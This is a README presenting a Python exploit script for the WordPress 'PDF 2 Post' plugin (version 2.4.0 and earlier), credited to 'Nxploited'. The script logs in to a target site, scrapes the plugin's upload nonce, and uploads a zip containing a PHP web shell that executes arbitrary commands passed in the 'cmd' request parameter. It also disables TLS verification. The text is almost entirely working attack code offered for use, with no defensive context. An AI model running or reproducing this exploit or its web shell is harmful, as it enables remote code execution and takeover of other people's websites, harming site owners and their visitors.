README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import argparse
from bs4 import BeautifulSoup
import zipfile
import os
# By: Khaled Alenzi (Nxploited)
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def log_success(message):
print(f"[+] {message}")
def log_failure(message):
print(f"[-] {message}")
def login(url, username, password):
login_url = url.rstrip("/") + '/wp-login.php'
payload = {
'log': username,
'pwd': password,
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
headers = {'User-Agent': user_agent}
response = session.post(login_url, data=payload, headers=headers)
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
log_success("Logged in successfully.")
return True
else:
log_failure("Failed to log in.")
return False
def extract_nonce(page_content):
soup = BeautifulSoup(page_content, 'html.parser')
nonce_input = soup.find('input', {'name': 'pdf2post_upload_nonce'})
if nonce_input and nonce_input.has_attr('value'):
return nonce_input['value']
return None
def get_upload_nonce(url):
target_url = url.rstrip("/") + '/wp-admin/edit.php?page=new-post-from-pdf'
headers = {'User-Agent': user_agent}
response = session.get(target_url, headers=headers)
if response.status_code != 200:
log_failure("Failed to load upload page.")
return None
nonce = extract_nonce(response.text)
if nonce:
log_success(f"Found nonce: {nonce}")
else:
log_failure("Nonce not found.")
return nonce
def create_zip_payload(zip_name='Nxploited.zip', php_name='nxploited.php'):
php_code = """<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
} else {
echo "Nxploited shell";
}
?>"""
with open(php_name, "w") as f:
f.write(php_code)
with zipfile.ZipFile(zip_name, 'w') as zipf:
zipf.write(php_name)
os.remove(php_name)
log_success(f"Payload {zip_name} created successfully.")
def upload_payload(url, nonce, zip_filename):
target_url = url.rstrip("/") + '/wp-admin/edit.php?page=new-post-from-pdf'
with open(zip_filename, 'rb') as f:
files = {
'pdf_file_to_upload': (zip_filename, f, 'application/zip')
}
data = {
'pdf2post_upload_nonce': nonce,
'_wp_http_referer': '/wp-admin/edit.php?page=new-post-from-pdf'
}
headers = {
'User-Agent': user_agent
}
response = session.post(target_url, headers=headers, data=data, files=files)
if response.status_code == 200 and "File uploaded successfully" in response.text:
log_success("Payload uploaded.")
else:
log_failure("Upload failed or payload not processed.")
def main():
parser = argparse.ArgumentParser(description="Exploit for WordPress PDF 2 Post Plugin <= 2.4.0 # By Nxploited (Khaled Alenazi)")
parser.add_argument('--url', '-u', required=True, help="Target WordPress site URL")
parser.add_argument('--username', '-un', required=True, help="Username")
parser.add_argument('--password', '-p', required=True, help="Password")
args = parser.parse_args()
print("Exploit By: Khaled_alenazi (Nxploited)")
create_zip_payload()
if not login(args.url, args.username, args.password):
return
nonce = get_upload_nonce(args.url)
if nonce:
upload_payload(args.url, nonce, "Nxploited.zip")
else:
log_failure("Aborting exploit due to missing nonce.")
if __name__ == "__main__":
main()